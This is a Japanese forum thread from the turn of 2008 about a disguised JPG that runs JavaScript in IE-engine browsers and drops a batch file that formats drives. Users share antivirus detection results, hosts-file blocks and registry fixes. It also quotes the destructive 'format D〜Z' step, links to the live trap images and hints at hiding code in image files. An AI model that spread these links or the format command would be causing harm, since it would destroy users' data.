踏むとフォーマットされるヤバイ画像対策専用スレ

誰か立てろよ

　　　　　 ／￣￣￣￣￣￣ ＼
/⌒ヽ　 /　''''''　　　　　''''''　　　ヽ
| 　/ 　 |　（●）,　　　､（●）　　　|
|　|　 　|　　　 ,,ﾉ(､_, )ヽ､,,　　　　 |
|　|　 　|　　　 ｀-=ﾆ=- '　　　　　 |　　
| ｜　　 ! 　　　 ｀ﾆﾆ´　　　　　　.!　　 　　　天狗じゃ、これも天狗の仕業じゃ！
| /　　　 ＼ ＿＿＿_＿＿＿ ／
| |　　　　///／Ｗ＼ヽヽヽヽ＼
| |　　　////ＷＷＷヽヽヽヽヽヽヽ
| |　　////ＷＷＷＷヽヽヽヽヽヽヽ
Ｅ⊂////ＷＷＷＷＷヽヽヽヽヽヽヽ
Ｅ／///　　　　　　　　　ヽヽヽヽヽヽヽ
| |　 //ＷＷＷＷＷＷＷヽヽヽヽヽヽヽ

format D〜Z A B Cの順で効果的にふぉーまっと
ハードディスク全滅ＯＴＬ

おれのパソコンは今、Ｓをフォーマット中・・・
みなさんさようなら・・・

今日まで色々とありが

>>3-4
逝っちゃたの？

[ν速の転載]
概要まとめ
2007/12/30(日)、gigigi（アップローダー）にてエロ画像がUPされる。
画像にはアドレス（実行ファイルのスクリプトへの）が貼られており、これをクリックするとブラクラが発動、最終的にデスクトップにbatファイルをDLさせる。
再起動した瞬間に発動し、強制的にHDDをフォーマットする。
Internet Explorer系のレンダリングエンジンを使っているブラウザ（2chブラウザ）だと発動する。これはIEが画像ファイルをテキストやhtmlとして展開しようとするからである。

ギコナビ　→　ポップアップ　→　死亡
Jane doe系　→　生存
Jane IE系　→　死亡
スレイプニル＆unDonut等のIE系　→　死亡
火狐＆オペラ等の非IE系、またはエンジン切り替え(Gecko等)　→　生存

アンチウイルスソフト対応状況
AntiVir ○
BitDefender
ノートン
ウィルスバスター
マカフィー
カスペルスキー ○ 検出名：Trojan-Downloader.JS.Agent.aqr
ウイルスキラー
Windows Live
Live one care
ウイルスセキュリティーZERO
avast!
AVG ○
キングソフト
NOD ○
F-Secure ○ 検出名：BAT/FORMATC.H

俺のエロ漫画が消えたじゃないか

>>6
IE系でいうとMaxthonも死亡だな。

これ、いったい、何の攻撃なの？？

・MS04-028を利用？
・MS04-028のような穴を新たに発見した０デイ？
・IE系ブラウザの実装の問題？

常駐スレに何回か貼り付けてるやつがいるんだけど
こういうの犯罪にならないの？

>>11 なるよ。器物損壊とか威力業務妨害とか。

サンクス　
とりあえず通報してみる

>>10
０Dayとかそんな大層なもんじゃなくて、ブラクラ詰め合わせ。
BATファイルをスタートアップへダウンロードさせて、なんか色々ダイアログ出て、再起動したらスタートアップと書き換わったAutoexecが実行されて
HDDが順番にフォーマットされるという単純なもの

ついでに言っておくと今のところIE６だけだな。他のブラウザだと大丈夫。IE7でも問題なし。
JPGファイルがJavaScriptになってる古典的なやつだよ。

再起動の命令を出すのも確か勝手にDLされるbatファイルだっけ
いわゆるformat c:\のやつかな？

>>16
そそ、詳しくはν即にすれ立ってるからそこで様子見してくればいいよ。ただし、問題のJpgが結構貼ってある
から注意な。

専用ブラウザとFirefoxで踏んだけど問題なかった
Operaも当然問題なかったし、やっぱりTridentエンジンが危険っぽいな

まぁ要するにIE6使うなってことだな。IE6のコンポーネント使っているものでもダメだから注意な。

HDDをフォーマットするブラクラ まとめwiki
ttp://www13.atwiki.jp/burakura_hdd/

■一番簡単な対策（基本中の基本）■
　ツール→インターネットオプション
　セイキュリティ→
　インターネットゾーン・レベルのカスタマイズ
　→拡張子ではなく、内容によってファイルを開く
　　●無効

カスペ先生愛してる

カスペ先生を犯るのは俺だ！>>22には渡さん！

>　→拡張子ではなく、内容によってファイルを開く
この設定はないよな

NOD系のスレにも書き込んだけど、NODは今回のトロイ、まだ対応してない気がする。

ESET Smart Security その４
http://pc11.2ch.net/test/read.cgi/sec/1197385178/676
> それ間違い。検出名がずっと気になってたんで今体験版で試したけど、NODじゃトロイ本体は検出できない感じ。
> （Virtual PCに体験版放り込んで、テストしてみた。）
>
> ブラクラ発動後にダウンロードされるウイルスの方を検出しているだけで、トロイ本体の方は、まだ対応してない？
>
> 何でかっていうと、N速に貼ってある今回のトロイのファイル、NODが入っていても（パターンファイル最新12/30版）、
> 普通にダウンロードできてしまうので．．．（カスペだとダウンロード時に検出されて引っかかる）
>
> なんで、NOD系の人はまだ注意した方が良いと思う。

まさに今年の世相「偽」ブラクラ

>>25
気がするも何も、そのスレにあるこの画像が未対応なことを証明してるんじゃ…

http://up2.viploader.net/upphp/src/vlphp114643.jpg

他の対応済みAVとは異なり、ESET系列がブロックしたと言ってるのは
問題のjpgではなく画像のスクリプト実行後にDLされるファイル
このファイルのDLに進むということから、問題のjpgはスルーなのが分かる
だから、亜種が出たり落ちてくる物によっては危ないかもな

それっぽいの踏んだんだけど、画像が出てきただけでブラクラにはならなかったんだが大丈夫だよな？

>>27
ん〜、やっぱりそうだよね。　Wikiで○ついてたけど、検出名が変だったので確かめてみたんだけどね。

俺の所で実際に検出させた結果では、確実に止められるのは今の所AVG，AntiVir，カスペの３つ。
この3つは、きっちり止められる。（元の1230.jpg自体をトロイとして検出して、隔離する。）

NODは止めきれない。F-Secureは不明。（今の所、俺の方ではテストできない）

今、Norton NAV2008の仮想環境作成中。テスト終わったら報告するわ。

感染してない→対応
感染する→未対応

だろ

未対応のavastスレどこ？

>>30
今回のはトロイであってウイルスじゃないから、感染するかどうかってのは問題の本質とは違う。

トロイの実行を止められなければ、未対応と考えて良い。トロイが実行された結果ダウンロードされる
ウイルスに感染しないかどうかは、別の問題。　その辺を理解してない人が結構多い。

だから、オンラインスキャンで検査なんて、的外れな話が出てくる。

トロイは、基本、常駐型のウイルス対策ソフトじゃないと防げん。　トロイの中身によっては、実行された時点で
PCからファイルや情報抜かれる場合もあるんだし。　そんなん、後からオンラインスキャンかけたって手遅れ。

F-Secureはバッチリ対応してる
参考までに分けて試した結果を貼っておきます
共に http://www.virustotal.com による解析の結果です

・今回新登場のTrojan-Downloaderに反応する製品

AntiVir：TR/Dldr.Agent.aqr.20
AVG：Small.2.BJ
F-Secure：Trojan-Downloader.JS.Agent.aqr
Ikarus：Trojan-Downloader.JS.Agent.aqr
Kaspersky：Trojan-Downloader.JS.Agent.aqr
Sophos：Troj/Iframe-N
Webwasher-Gateway ：Trojan.Dldr.Agent.aqr.20

・Trojan-DownloaderがDLするフォーマット用BATファイルに反応する製品

AntiVir：HEUR/Trojan.DIRKiller
Authentium：BAT/FormatC.H
ClamAV：Trojan.Bat.DeltreeY-2
Fortinet：BAT/Deltree.gen!tr
F-Prot：BAT/FormatC.H
F-Secure：BAT/FormatC.H
NOD32v2：BAT/DeltreeY.AN
Rising：Trojan.BAT.FormatAll.c
TheHacker：Bat/Generic

AntiVirとF-Secureが安心かもね

namidame〜ってのを踏んだ気がするけど、今のところ何ともない。
必要な時以外JAVAを入れないようにしてるから助かったのでしょうか。

>>29
>今、Norton NAV2008の仮想環境作成中。テスト終わったら報告するわ。

テスト終わった。残念ながら、NAV2008 + データベース 2007/12/31 では、1230.jpgをトロイとして認識しません。

今の所、トロイのリンク先のサーバーが落ちているのでウイルスのダウンロードは無いですが、
Norton系ユーザーの方は、引き続きご注意を。

0x0のBMPファイル作って尻にコード入れてみ
すげー笑えると思うから

>>33
>38の後、NAV2008をアンインストール → F-Secure評価版をインストールで確かめました。

F-Secureは、1230.jpgを Trojan-Downloader.JS.Agent.aqr として検知・隔離します。
ですので、F-Secureもきっちり止める組ですね。

防御成功時のパターンファイルは、2007-12-31_08 でした。
（多分、もっと前のパターンファイルから防御に成功していたと思われます。）

Wiki直して、寝ます。(w

>>38
おつかれさまです
質問
ノートン先生はスクリプトを実行する前には反応しなかったのでしょうか？
お疲れのところスミマセン

>>41
しませんでした。　と言っても、スクリプト自体が、ウイルス等のダウンロードサイトが落ちていて今はまともに動かないのですが。

なので、現状ではNortonは実際にウイルスファイルをダウンロードした時点での防御になると思われます。

とりあえず、スクリプトがダウンロードに行くサイトが復活するまでは、Nortonでも危険性は低いと思います。
まあ、早く対応はして欲しいところですけど。

>>42
ありがとうございます

2.3日前dailymotionに動画をうｐしてる最中に大量の警告が出た
だから途中でうｐを断念した。確かIEが強制終了
ちなみに以前はうｐを成功させてる
なんか関係あんのかな


再起動についてだけど電源を切らずにスタンバイがデフォになってるのでまだそれ以降電源の入切はしてない

じゃあ、今度はN先生に協力してもらいましょうか。

wikiの対策のところの

ブラクラを仕込む〜.comにアクセスしないようにする
その1 PFWでcunt.multiservers.comをブロックする。
その2 \windows\system32\drivers\etc\hostsに
127.0.0.1 snipr.com
127.0.0.1 cunt.multiservers.com
書く。

IEの設定変更
C:\WINDOWS\system32\drivers\etc
にあるhostsファイルを書き換え。

ってのは信じｒていいんだよな？
ホストってそこに通じるように設定するんじゃいのか？と思って疑ってしまう。
それと、ブラクラを仕込むとIEの設定変更のホストって違うの？

>>46にある、PFWって何のこと？

>>46
URLがhttp://snipr.comのときhttp://127.0.0.1にアクセスしるって設定だよ。
127.0.0.1は自分のPC。

>>47
パーソナルファイアウォール

Personal Firewall

>>48
さんくす。設定してくる。
PFWもよく分かってないんだけど、avastのWebシールドのURLブロックに
cunt.multiservers.comを入れとけばいいのかな

パーソナルファイアウォールってソフト名じゃなくて個人個人が使ってるファイアウォールソフトの総称でいいの？

うん、多分。
http://eazyfox.homelinux.org/Firewall/Firewall3.htm

普段からセキュリティに気をつけてる奴はこんなの引っかからないんだけどね。

つーかIEコンポのブラウザ使わなければ関係ないってこと？

画像の方はね
最終的に誘導される方はGeckoでも食らう気がする

noscriptのアドオンいれてれば安全じゃね？

FWの設定とかよく分からん人はとりあえずJavaScript切っとけばおｋ？

カスペ＆AVG最強伝説始まる

そういや、おいらの職場。XP+IE6+バスターcorpしか認められてない。
4000人の社員がいるんだけどね。
1/4から営業開始です。

こういうときもしっかりと対応するNOD最高！世界で一番人気あるのもわかるわ。
ノートンは糞、シマンテックはさっさと潰れろ。

これって、アンチウイルス以外のソフトでも防げるんですか？
例えばwindows defenderでスタートアップの変更を監視とか。
System Safety Monitorで許可されてないプログラムは実行させないとか。

ノートン　バスター　マカフィー
国内じゃ使用ユーザー数はこの３強だよな・・・

いい加減にしろ

http://www5.uploader.jp/dl/tane/tane_uljp00206.jpg.html
亜種？

>>63
これなんだろ？
IE7だとグーグルにいくし
火狐だと白いページ

今更ですが、あけおめ。

>>63
・カスペではトロイの木馬 Trojan-Downloader.HTML.Agent.ir
・AVGでは、Trojan horse Small.2.BJ

として検出されます。(他のではテストしてません）　中身は、ulip00206.jpgの後半＝1230.jpgなので、亜種と考えて良いのでは。

>>64
あんまり無防備に踏まない方が良いですよ。

-----

NAVのウイルス定義ファイルの更新があったので、>38の環境をコピーし直して（※ Virtual PCですので）
再度テストしてみましたが、1/1 10:00 時点でまだ駄目です。

その後、今度はNAV2008をアンインストール → avast!4をインストールで確かめました。
こっちも、1230.jpgはスルーしますので現時点で未対応です。（データベース 071231-0）

Norton，Avast!使用者は引き続きご注意下さい。

>>65
おつかれサマ


ところでスクリプトの暗号化を解読する方法ってどうやるの

これを機にプニル1.66から最新版に切り替え、Geckoエンジンを導入してみた
が…使い辛ぇえええええ…キーワード検索できないし変なふうに表示されるサイトあるし
プラグインとか探さないとだめなのかねこれは。そのままお手軽に使いたいのにまんどくせ…

Sleipnirは1.66が軽いし十分な機能を持っている
2xxでGecko使うならFirefoxがﾏｼだったよ

個人的にはインスコ不要なSeaMonky勧める

一応OperaとFirefoxも試したんだよね
Operaはダメだ･･･ニコ動で停止・再生でいやに重くなる。ニコ厨の俺には向かない。
Firefoxは、なんかそのままでも使えそうな気がしたけど生のままだと機能すげー少ないのね。
UIを改造しなきゃだめみたいなことがまとめに書いてあったが、スクリプトいじるとか大変そうだったから
プニルの最新版に逃げてみた。しかしこれまた使いづらい…
もうどうにもならねー。マジで困るトロイ作ってくれたもんだよ

>>70
なんというか・・・全部慣れの問題じゃね？
ブラウザ乗り換えはいつも面倒なもんだよ

その面倒を乗り越えた先にあるのが
Opera最強伝説というわけだよ

OperaはノートンとケンカしてWin2kごと落とされた嫌な思い出が

まあ今は安定したもんよ

火狐は知らないけど、プニルはいいよ
慣れるとマウスカーソル全く動かさずにＷｅｂ閲覧やタブ飛びできるようになる

そんなのOperaだって余裕

Jane doe使いでほとんど2chしか見ない俺は安全だな
喜ぶべきか、悲しむべきかｗ

画面がえらい暗く感じるんだけど
仕様？

>>78
誤爆

バスターは対応した？
ウイルスパターンファイルは今日も更新されたけど。

だれかチェック出来るようなコードを書いてくれないかな。電卓が立ち上がるだけとかの。
いまいち自分の環境が大丈夫なのかワカラン。

まず、携帯フルブラウザで見てオケそうだったらＰＣ閲覧するとか

それは何の意味もないだろう

ようはIE6、またはIEコンポーネントのブラウザで開かなければいいってことだろ

それもそうだな
ところでsymantecとtrendは現時点未対応でfixなんだよね？

IE6で開いても大丈夫だったけど？

javaスクリプトオフで防げる

そういう問題じゃないｗ

こんなのに引っかかる馬鹿なんているの？

IEなんか使ってる奴なんているの？

このトロイの仕組みが分からないんだけど
>>15
が答えでしょうか？単なる以前からある拡張子偽装って事？

IEそのまま使ってる人が一番多いだろ

こういう板に居ても、IEコンポーネントのタブブラウザは沢山居るし

つーか、脆弱性放置のMSが馬鹿

スレイプニールでも大丈夫だった

先月のWindowsうｐだてのスレですら、IEが落ちるって騒いでたろ
プニルやDonut系は平気だっていうのに。

IE使ってるヤツはそんだけ多いんだよ

要するに、ＧＤＡＴＡ最強って事？

いいえ、キングです。

今年の大晦日もまた独りぼっちだった・・・orz

俺・・・バイト後、2chでガキの使い実況
友・・・彼女と合体

親・・・高級料亭で食事
姉・・・年越し合コン
弟・・・彼氏とディズニーでお泊り

またお正月に家で一人お留守番する仕事が始まるお・・・

＞弟・・・彼氏とディズニーでお泊り
＞弟・・・彼氏とディズニーでお泊り

>>3の症状見てると、どうやら自分も踏んじまってるみたいだ；；
Dﾄﾞﾗｲﾌﾞだけフォーマットされちまったみたいなんだけど、それ以降のは何故か助かっている。
おそらく間にDVDドライブ挟んであったからなのかな?どっちにしてもDに溜め込んでたデータが
きれいに無くなってる模様。（パーティションだけ生成されてる？みたいでフォーマットして下さいと出る）

だれか助けてヽ(;´Д｀)ノ

おそらく、何処かの画像踏んで再起動掛けた時に「あれ？」って思ったんだよな。
これが確か25日以降の出来事・・・昨日まで気づかなかったのはご愛嬌で＾＾；

>>100
finaldataとか復元製品試すしかないのでは？
上書き系消去じゃなくてformat系ってことだし

レスサンクス
今フリーの奴でD:スキャン中・・・これ丸1日掛かりそうだな；；

で気になるんだけど、月額版バスターでIE7で踏んでるんだよね。
ひょっとしたら、IE設定とかデフォのままがいけなかった？

わらた

テストする環境を持ってる方がいたら、IEのセキュリティ設定で「拡張子ではなく、内容によってファイルを開くこと」って項目があるからそいつを無効にするにして踏んでみてくれない?

IEやIEコンポのブラウザでしかもセキュリティ設定デフォのままホイホイ
正体不明の画像とか踏む奴がいること自体信じられない

>>106
おそらく日本人の8割はそんなのだぞ

視野狭窄なんだろうな

水と安全はタダなのが日本のデフォ

いいことじゃないか

新年早々流出カップルいるけどなｗ

>>98
このコピペは何度見ても・・・
１回で飽きる。

義務教育課程でインターネットセキュリティの授業を組み込むべき
イヤまじで

ていうかパソコンをオンラインにしてネットに晒す危険性についての
アナウンスがされてなさすぎだろ

「インターネットセキュリティ？ああ、うぃにー？で情報流出とかあったよね？
　でも私使ってないから多分だいじょうぶだしぃ
　え、インターネットオプション？何それ？ウイルス対策ソフト？
　あーなんかパソコンの電源つけた後画面の右下に変な警告出るねー、それがどうかしたの？」
こんぐらいの認識だろ、ガチで

170 名前：名無しさん＠八周年[sage] 投稿日：2008/01/01(火) 21:35:07 ID:QjT0BcVQ0
簡単な対策

System32のFORMAT.COMを消す

どうせ使わんよ

まとめサイトを見ると、素早い対応だったのに無視されてるベンダーや
間違いが放置されたままでしたので、対応順にまとめてみました。
時間のある方が居れば、wikiの空欄を埋めて頂きたいです

ヒューリスティック
　Webwasher-Gateway　JavaScript.CodeUnfolding.gen!High (suspicious)
12月29日
　Sophos　Troj/Iframe-N
12月30日
　AVG　Small.2.BJ
12月31日
　AntiVir　TR/Dldr.Agent.aqr.20
　F-Secure　Trojan-Downloader.JS.Agent.aqr
　G DATA　Trojan-Downloader.JS.Agent.aqr
　Ikarus　Trojan-Downloader.JS.Agent.aqr
　Kaspersky　Trojan-Downloader.JS.Agent.aqr
　Webwasher-Gateway ：Trojan.Dldr.Agent.aqr.20　←定義ファイルでも対応
01月01日
　現在のところなし？

avastも昨日（３１日）更新あったけど
これに対応してるのかは知らないな。

アバストはしてないってさ

>>115
それってドライブのフォーマットできなくなるわけだよね？
後からそのファイル復帰することってできんの？
できるんだったら別のドライブにそのファイル退避しといて使うときだけ戻せば最強じゃね？

wiki見てきたけど、俺が引っ掛かったのは亜種だったのかなぁ・・
あんな派手に警告やらポップアップしなかったし、ただ再起動した時におかしいなと思ったくらいでさ。

>>120
それ言い出したら、結局のところ、
TrueImageなどを使ったフルバックアップが最強じゃね？

こういうのは触れないのが基本だぜ。

万一、触れちゃったときは不安を抱えたまま使い続けるよりも、
ＯＳ再インストールorバックアップから復元、こそが最強。

備えあれば憂いなし、だ！

NISとAntiVir常駐させてても平気でぶち抜いて来る奴がいるのに無防備な奴多すぎ

>>122
いや、フルバックアップは普段からするものだろ。
でも復旧には時間かかるからしたくないだろ。
フォーマットできなくしとけばトロイ削除して問題なくなった後ファイル戻せば済む話だろ。
そのほうが楽だろ。つーかなんで触れちゃだめなんだ？

ノートン、バスター、マカフィーの御三家が
全く役立たずだった事が判明

フリーにも劣るとは・・・

この画像踏んでフォーマットされたって人いるの？















ざまぁｗｗｗｗｗｗｗ

そういえば最近ＡＶＧでトロイ警告が出たな

結局フリーのＡＶＧ入れてた俺は勝ち組ｗｗｗ
金出してても役に立たないのは立たないねｗ

http://internet.watch.impress.co.jp/cda/news/2006/12/01/14107.html
サイトを見る前に、URLから運営者情報を確認できる「aguse」

　Webシステム構築を手掛けるブイモールは1日、メールなどに記載されたリンク先のURLを入力することで、
サイト情報を調べられるサービス「aguse（ベータ版）」を公開した。利用は無料。
　aguseでは、調べたいサイトのURLを入力するだけで、当該サイトのIPアドレスや逆引きホスト名、
スクリーンショット画像などを確認できる。これにより、初めてアクセスするサイトの内容を事前にチェックできる。
　また、Googleマップを利用したサーバーの位置情報や詳しいドメイン・管理者情報のほか、企業や団体が
提供するフィッシングサイトブラックリストとも照合できる。なお、サイトによっては情報の取得に時間を要する場合もある。
　ブイモールは、「とりあえず手元にある技術を使って、便利なサイトを作ってみた。今のところ収益は考えていない」と
コメント。今後は、届いたメールの送信経路が調べられる機能を2007年1月に追加。さらに、aguseに蓄積した情報を元に
照合できるデータベース機能などを予定する。

(2007/12/17) http://www.aguse.net → http://www.aguse.jp として正式に運用を再開しました。
お手数ですがブックマークの変更をお願いいたします。

サイトを見る前に、URLから運営者情報を確認できるサイト
http://news20.2ch.net/test/read.cgi/news/1164969914/

JaneDoeStyleのビューアで踏んでしまった…

AVGで検索して何も引っかからないんだけど
再起動して大丈夫かね？

スタートアップ見ておけ
怪しいbatファイルがあれば手動削除で

要するにフォーマットされちまったら、リカバリ、再インストってことなの？
つーか、それで元に戻るなら・・・。

>>130

570 名前：名無しさん＠八周年[] 投稿日：2007/12/31(月) 07:34:28 ID:UpN/oKQ90
>>562
感染確認
心配な人、↓にbatファイルが無ければおｋ

スタートアップ
Windows 9x/Me
C:\WINDOWS\All Users\ｽﾀｰﾄ ﾒﾆｭｰ\ﾌﾟﾛｸﾞﾗﾑ\ｽﾀｰﾄｱｯﾌﾟ\BugFix[ランダムな数値].txt(空白).bat
Windows NT/2000
C:\WINNT\Profiles\All Users\スタートメニュー\プログラム\スタートアップ\IE_Up[ランダムな数値].txt(空白).bat
Windows XP
C:\Documents and Settings\All Users\スタート メニュー\プログラム\スタートアップ\WinUpd[ランダムな数値].txt(空白).bat

AUTOEXEC.BAT
Windows 9x
C:\AUTOEXEC.BAT .txt
Windows XP
C:\WINDOWS\SYSTEM32\AUTOEXEC.NT .txt

クイック起動
Windows 9x
C:\WINDOWS\Application Data\Microsoft\Internet Explorer\Quick Launch\AntiVirus[ランダムな数値].txt(空白).bat
Windows 2000/XP
C:\Documents and Settings\All Users\Application Data\Microsoft\Internet Explorer\Quick Launch\SecurityAlert[ランダムな数値].txt(空白).bat

>>131
>>133
サンクス
隠しファイル表示ONにして見てみたけど何も無かった。
Doe系だったからセーフなのかな。

35 ：名無し募集中。。。 ：2008/01/01(火) 20:39:41.15 0
>>1
バスターの性能を試したくてあえて踏んだ
例によってブラクラ発動
バスターは無警告、無反応で使えない事が判明
再起動したけど何もなし

翌日起動したら、マイコンピュータのＤＶＤアイコンが消えて
ＤＶＤが利用できなくなった
他にも異常が多数発生

レジストリが書き換えられていた模様
システム復元で元通り復旧

705 名前：名無し募集中。。。　[]　投稿日：2008/01/01(火) 23:38:44.79 0
マイコンピュータから
ＤＶＤドライブのアイコンが両方とも消えている・・・
おかしいと思って
デバイスマネージャで見たら
ＤＶＤの所に「！」マークが・・・

で更にプロセッサの所に「！」
どうしたら、いいんでしょうか？

748 名前：名無し募集中。。。　[]　投稿日：2008/01/02(水) 00:05:36.64 O 　　　New!!
うちのﾊﾟｿもDVDやられてて
なんか踏んでたのかﾉｰﾄﾝ反応無かったお

724 名前：名無し募集中。。。　[]　投稿日：2008/01/01(火) 23:50:49.65 0 　　　New!!
実際にＨＤＤまでいかれた奴いるのかな？
今のところは>>35>>705みたいにＤＶＤ使えなくなる程度の被害だけっぽい

>>115
正直目から鱗

>>135
それ何処のスレ？
俺はD:のHDDが見事にデータ飛んでるからな・・・なんか色々なパターンがあるな、どゆこと！？

>>137
その人たちはDドライブにDVDドライブがあったんだろ
もしDドライブにFDDがあったらそれが消されてるだろうし
HDDがあったらそれが消されてるだろう

これって　Dドライブから順番にEFGH・・・ってつぶしていくんだよね？

バッチファイル微妙に書き換えてる可能性もあるからなぁ

>>137 >>135はここ
【モ娘（狼）】踏むとHDDがフォーマットされるヤバイ画像問題について
http://mamono.2ch.net/test/read.cgi/morningcoffee/1199186657/l50#tag330

>>138
俺はＦとＧのＤＶＤドライブが消された

どんだけＩＥで2ｃｈ見てるんだよｗ

俺のＰＣはＤの位置に後付のＨＤＤ接続してんだけど
症状によってはＤＶＤドライブが逝くって書いてあったから確認してみた

・・・
動かない・・・
ウィルスにやられたかと思って色々確認してみたら
数日前に導入したwin_acceleratorの起動短縮がネックになってったっぽい
ＯＦＦにして再起動したら全く問題なかった
ふぅ、あせったぜｗ

さっさと脆弱性、直せよM$

この糞企業に非難決議出ないのがおかしいな

Mac使えばいいじゃない

このヤバイ画像かちゅ〜しゃで踏んで開いた先が404だったんだけどセーフ？
>133しらべても問題なかったけど・・・

ラストドライブが仮想なおいらってばすごいね！

某所で情報貰って飛んできました

俺IE7だけど>>103が踏んでるってのが心配になって
一応セキュリティ設定とhostsは対応済みで
>>120をやっておく事にした。念の為確認だけどこれで最強？


どんだけ心配性なんだよと思われるかも知れないけど

35 ：名無し募集中。。。 ：2008/01/01(火) 20:39:41.15 0
>>1
バスターの性能を試したくてあえて踏んだ
例によってブラクラ発動
バスターは無警告、無反応で使えない事が判明
再起動したけど何もなし

翌日起動したら、マイコンピュータのＤＶＤアイコンが消えて
ＤＶＤが利用できなくなった
他にも異常が多数発生

レジストリが書き換えられていた模様
システム復元で元通り復旧

705 名前：名無し募集中。。。　[]　投稿日：2008/01/01(火) 23:38:44.79 0
マイコンピュータから
ＤＶＤドライブのアイコンが両方とも消えている・・・
おかしいと思って
デバイスマネージャで見たら
ＤＶＤの所に「！」マークが・・・

で更にプロセッサの所に「！」
どうしたら、いいんでしょうか？

748 名前：名無し募集中。。。　[]　投稿日：2008/01/02(水) 00:05:36.64 O 　　　New!!
うちのﾊﾟｿもDVDやられてて
なんか踏んでたのかﾉｰﾄﾝ反応無かったお

今の所、マイコンピュータのＤＶＤアイコンが消し飛んでＤＶＤ利用出来なくなった報告が結構多い（大半はシステム復元で復旧）
ただ、HDDが飛んだっていう報告や他のデバイスが使えなくなった報告もあるので色々なパターンがある模様
http://mamono.2ch.net/test/read.cgi/morningcoffee/1199186657/
http://pc11.2ch.net/test/read.cgi/sec/1199083492/

ttp://gunkanmaki.jog.buttobi.net/MiniReport20040313.html

もうね、これ一体何年前の話って感じ。おまいらまだ学習してないの？
少なくとも４年近くも前からずっと２ちゃんで話題になって、
鑑定スレのテンプレにもとっくに載ってるだろ。

すまん誤爆

怖い人は、標準のブラウザを火狐にすればいい。
IEの人は、以下を参考に。
http://kissho.xii.jp/1/src/1jyou21930.jpg

インターネットオプション(IE)の「拡張子ではなく、内容によってファイルを開く」の
項目を『無効』に設定。これで画像を擬装したhtmlファイルは無効化されます。

画像が表示されずに直接htmlがプレーンテキストで表示された人は
jpg偽装には対応できています。
http://www5.uploader.jp/dl/tane/tane_uljp00206.jpg.html


Sleipnir系等ブラウザ側がこの設定に対応してない場合はさらに、
レジストリの設定が必要です。
以下をテキストエディタ（ノートパッド等）に保存して、
拡張子を.regに変えることでレジストリファイルが作れます。

これを右クリックから結合でレジストリに書き込まれます。

======↓ここから↓======
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_SNIFFING]
"Sleipnir.exe"=dword:00000001
======↑ここまで↑======

Sleipnir以外のIEコンポーネントブラウザを使っている場合は"Sleipnir.exe"の部分を、
使用しているブラウザのexeファイルに変えてください。

つか日本の御三家はまだどれも対応してないのな
金払ってるの馬鹿らしくなったりしないのかね

しょうがないよ。
旧御三家なんて一日に一回しか更新しない糞セキュリティソフトばかり。
脳豚や馬鹿フィーなんて更新料取る分ウイルスセキュリティ以下のゴミソフト

janeもＩＥなんでそ？

JaneはIEとDoeの二つ
IEのほうはもちろん感染する

avast更新きたな
やっと対応したか

virustotalで確認してみた。
残念ながらAvastは7.5.0.516(2008.01.01)では未対応のままです。
意外なことに動きがあったのはMSで他は以前の報告と変化なしでした。

Microsoft　1.3109　2008.01.02　TrojanDownloader:JS/Agent.JG

>>116-167
ご苦労様です。

NOD32なんですが、今の所トロイ本体には対応してないので、WikiのNOD32の対応　○から無しに書き換えようか、思案中。
（当方の体験版入れたVirtual PCでは、思いっきりスルーしてトロイが動作する。）

今の状態だと、誤解を招くんだと思うんだよね．．．今日中に対応がなかったら、NOD32の○は消す予定。

御三家の対応は、今の感じだと4日以降かな。　タイミングもあるけど、今回はずいぶん遅く感じるね。(w

ブラウザはOpera、セキュリティソフトはバスターとAVG。
で>>153を開いて「ダウンロード」をクリックしてみた。

ttp://www5.uploader.jp/dl/tane/tane_uljp00208.jpg.html

こうなって、

ttp://www5.uploader.jp/dl/tane/tane_uljp00209.jpg.html

こうなりました。

ご参考になりましたら幸いです。

訂正です。　AVG→AGV
失礼しました。

ありゃ？AVGで間違ってなかったですね。恥ずかしい。

トロイ本体が欲しいんだけどスクリプトのコードが解読出来ねぇ

>>160
御三家はいずれも外国なので正月は無関係でしょ。
てか、御三家はこれまでの対応状況からすると、最低一週間はかかるでしょ。
遅いときは一ヶ月くらいかかることも珍しくないし。

世界規模ならまだしも地域が限定的なウイルスだから対応は遅くなりそう

あ、ごめんよ
簡単に入手出来た
どうぞ好きなだけなじって下さい
常時正月は酔っているんでｗ

>>161
AVG＝アダルトビデオギャル
AGV＝アバンギャルドビデオ

avastも対応きてるのか…ウィルスセキュリティは相変わらずだな…
フリーのアンチソフトもいいかなとは思うんだが、また別にファイアウォールとか
入れなきゃならんのが重かったりしてうざそうな気もするんだよなあ

話聞いてると、今回のはまともに被害くらったら個人ダメージはでかいが、
データ流出系の二次被害危険は低め、気づき易い、普段からある程度気をつけてれば
あまり引っかからない、被害は日本中心ってことで危険度は低く考えられてるんだろか

この下のレスのリンク先は危険ですか
http://mamono.2ch.net/test/read.cgi/newsplus/1199237647/225

>>170
ざっとファイルの中を見たけど、別に危険じゃない。何故かカスペオヤジ怒るけど。(w

ちなみに、タイトルにある写真じゃないよ。リンク先はHTMLのjrpg偽装ファイル。中身は下記の<HTML>から下） ※ 本来の中身から、urlのhttp://は全部抜いた。
リンク先のdate65125.jpgもjpeg偽装で、こっちは ttp://sakuratan.ddo.jp/uploader/source/date65124.gifの表示と、Sleipnir用の注意書き。
『 今話題のHDDをフォーマットするURLの対策不完全版です。Sleipnir用。 』とかいう説明で、何回か見た記憶あるが、何時の間にやら第4版になってるな。(w

<HTML>
<HEAD>
<META http-equiv="refresh" content="5;url= //sakuratan.ddo.jp/uploader/source/date65125.jpg">
<TITLE>test META refresh</TITLE>
</HEAD>
<BODY>
<pre>5秒後に自動で移動します。

5秒待っても自動で移動しなかった人は手動でリンククリックしてください。
リンクになって無い人は勝ち組です。URLコピペで進んでください。
<!-- これをコピペ→ sakuratan.ddo.jp/uploader/source/date65125.jpg -->
非IEブラウザで勝ち組だった人も出来ればIE等で確認しておいた方が良いです。

<a href=" sakuratan.ddo.jp/uploader/source/date65125.jpg" target="_blank"> sakuratan.ddo.jp/uploader/source/date65125.jpg</a></pre>
</BODY>
</HTML>

>>171
あらま。得意げにありがとよ

>>171
>ざっとファイルの中を見たけど、別に危険じゃない。何故かカスペオヤジ怒るけど。(w

ごめん、専ブラがちょうど他のファイルを開いたのとタイミングが重なっただけらしい。
もう一回チェックしたら、別に>170のファイルではカスペは何も言わなかった。

>>172
気に障ったかね？(w

2chで細かいこと気にしてたらストレスたまるぜ？　自分で踏めないのを他の人が代行したんだから、それでOKじゃん。

なんだIE7なら問題ないのか

無駄なレスはいらん

